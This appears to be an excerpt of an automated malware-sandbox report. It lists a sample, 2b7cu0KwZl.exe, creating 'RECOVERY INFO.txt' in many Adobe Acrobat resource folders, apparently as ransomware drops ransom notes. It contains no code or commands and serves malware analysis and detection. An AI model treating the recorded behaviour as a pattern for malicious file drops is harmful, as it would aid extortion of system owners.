Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\microsoftGraph\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\2.1.15\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\misc\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themeless_Reader\RECOVERY INFO.txtJump to behavior
